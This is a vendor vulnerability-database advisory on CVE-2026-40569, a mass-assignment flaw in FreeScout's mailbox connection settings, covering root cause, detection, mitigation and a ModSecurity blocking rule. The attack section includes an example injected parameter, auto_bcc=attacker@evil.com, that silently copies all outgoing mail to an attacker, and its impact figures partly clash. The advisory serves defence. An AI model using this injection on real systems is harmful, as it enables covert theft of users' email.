Join the Cyber Forum: Threat Intel on May 12, 2026 to learn how AI is reshaping threat defense.Join the Virtual Cyber Forum: Threat IntelRegister Now
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-40569

CVE-2026-40569: FreeScout Auth Bypass Vulnerability

CVE-2026-40569 is a mass assignment authentication bypass flaw in FreeScout that allows admins to silently modify critical mailbox settings. This article covers the technical details, affected versions, and mitigation.

Published: April 23, 2026

CVE-2026-40569 Overview

CVE-2026-40569 is a critical mass assignment vulnerability affecting FreeScout, a popular free self-hosted help desk and shared mailbox application. The vulnerability exists in the mailbox connection settings endpoints where user-controlled input is passed directly to the model's fill() method without proper field allowlisting, enabling authenticated administrators to overwrite security-critical mailbox configuration fields that should not be accessible through the connection settings interface.

Critical Impact

An authenticated admin can silently exfiltrate all outgoing emails by injecting hidden parameters, redirect SMTP traffic through attacker-controlled servers, inject malicious content into email signatures, and enable attacker-crafted auto-replies—all from a single HTTP request with no visible indication to other administrators.

Affected Products

  • FreeScout versions prior to 1.8.213
  • FreeScout self-hosted help desk installations
  • FreeScout shared mailbox deployments

Discovery Timeline

  • 2026-04-21 - CVE CVE-2026-40569 published to NVD
  • 2026-04-22 - Last updated in NVD database

Technical Details for CVE-2026-40569

Vulnerability Analysis

This vulnerability stems from improper access control (CWE-284) in FreeScout's mailbox connection settings handling. The affected endpoints connectionIncomingSave() at app/Http/Controllers/MailboxesController.php:468 and connectionOutgoingSave() at line 398 both pass $request->all() directly to $mailbox->fill() without implementing any field allowlisting mechanism.

The Mailbox model exposes 32 fields in its $fillable array, including security-critical fields such as auto_bcc, out_server, out_password, signature, auto_reply_enabled, and auto_reply_message. These fields are not intended to be modifiable through the connection settings form but become accessible due to the mass assignment flaw.

The vulnerability is exacerbated by the fact that validation in connectionIncomingSave() is entirely commented out, while the validator in connectionOutgoingSave() only checks value formats for SMTP fields without stripping extra parameters from the request.

Root Cause

The root cause is a classic mass assignment vulnerability pattern where the application accepts all user-supplied parameters and binds them directly to the database model without explicit allowlisting. In Laravel applications like FreeScout, the $fillable array on a model defines which attributes can be mass-assigned, but this protection is undermined when endpoints intended for specific functionality pass the entire request payload without filtering.

The absence of input validation in connectionIncomingSave() and insufficient validation in connectionOutgoingSave() compounds the issue, allowing attackers to inject arbitrary parameters that persist to the database and affect application behavior.

Attack Vector

The attack requires network access and high privileges (authenticated admin user), but exploitation is straightforward and has a changed scope impact due to its ability to affect resources beyond the vulnerable component. An attacker can exploit this by appending hidden parameters to a legitimate connection settings save request.

For example, an attacker could add auto_bcc=attacker@evil.com to a connection settings form submission. Because the auto_bcc field is not displayed on the connection settings form (it only appears on the general mailbox settings page), the injection remains invisible to other administrators reviewing connection settings. Once set, every outgoing email from the affected mailbox is silently BCC'd to the attacker via the SendReplyToCustomer job.

This attack is particularly dangerous in multi-admin environments where one admin can silently surveil mailboxes managed by others. Additionally, if an admin session is compromised via a separate vulnerability (such as XSS), the attacker gains persistent email exfiltration that survives session expiry.

Detection Methods for CVE-2026-40569

Indicators of Compromise

  • Unexpected values in mailbox auto_bcc fields pointing to external email addresses
  • Modified out_server configurations redirecting SMTP traffic to unknown servers
  • Unauthorized changes to signature fields containing tracking pixels or suspicious links
  • Enabled auto_reply_enabled flags with suspicious auto_reply_message content
  • HTTP POST requests to mailbox connection settings endpoints containing unexpected parameters

Detection Strategies

  • Implement database auditing to track changes to Mailbox model fields, particularly auto_bcc, out_server, signature, and auto_reply_enabled
  • Monitor HTTP request logs for POST requests to /mailboxes/*/connection-incoming and /mailboxes/*/connection-outgoing endpoints containing parameters outside the expected form fields
  • Review web application firewall (WAF) logs for requests with suspicious parameter injection patterns
  • Deploy network monitoring to detect SMTP traffic to unexpected external mail servers

Monitoring Recommendations

  • Enable comprehensive logging on FreeScout's mailbox configuration endpoints
  • Set up alerts for any modifications to mailbox BCC settings outside of the general settings interface
  • Monitor outbound email traffic patterns for unexpected BCC recipients or SMTP relay changes
  • Implement periodic integrity checks comparing mailbox configurations against known-good baselines

How to Mitigate CVE-2026-40569

Immediate Actions Required

  • Upgrade FreeScout to version 1.8.213 or later immediately
  • Audit all existing mailbox configurations for unauthorized changes to auto_bcc, out_server, signature, and auto_reply_enabled fields
  • Review admin user accounts and revoke any compromised or unnecessary admin privileges
  • Implement additional access controls for multi-admin environments

Patch Information

FreeScout has released version 1.8.213 which addresses this vulnerability. The fix can be obtained from the GitHub Release Version 1.8.213. The specific security patch commit implements proper field allowlisting for the affected endpoints. For additional context, refer to the GitHub Security Advisory GHSA-hmqm-33wp-858j.

Workarounds

  • Restrict admin access to only trusted personnel until the patch can be applied
  • Implement a web application firewall (WAF) rule to block POST requests containing unexpected parameters like auto_bcc, out_server, out_password, signature, auto_reply_enabled, or auto_reply_message to mailbox connection settings endpoints
  • Enable database-level triggers or constraints to alert on changes to sensitive Mailbox fields
  • Consider placing FreeScout behind an additional authentication layer to reduce attack surface
bash
# Example WAF rule to block suspicious parameters (ModSecurity format)
SecRule REQUEST_URI "@rx /mailboxes/.*/connection-(incoming|outgoing)" \
    "id:100001,phase:2,deny,status:403,\
    chain"
SecRule ARGS_NAMES "@rx ^(auto_bcc|signature|auto_reply_enabled|auto_reply_message)$" \
    "log,msg:'Potential CVE-2026-40569 mass assignment attempt'"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeAuth Bypass

  • Vendor/TechFreescout

  • SeverityCRITICAL

  • CVSS Score9.0

  • EPSS Probability0.04%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityLow
  • CWE References
  • CWE-284
  • Technical References
  • GitHub Commit Update

  • GitHub Release Version 1.8.213

  • GitHub Security Advisory GHSA-hmqm-33wp-858j
  • Related CVEs
  • CVE-2026-40496: FreeScout Auth Bypass Vulnerability

  • CVE-2026-40591: FreeScout Auth Bypass Vulnerability

  • CVE-2026-41191: FreeScout Auth Bypass Vulnerability

  • CVE-2026-40590: FreeScout Auth Bypass Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English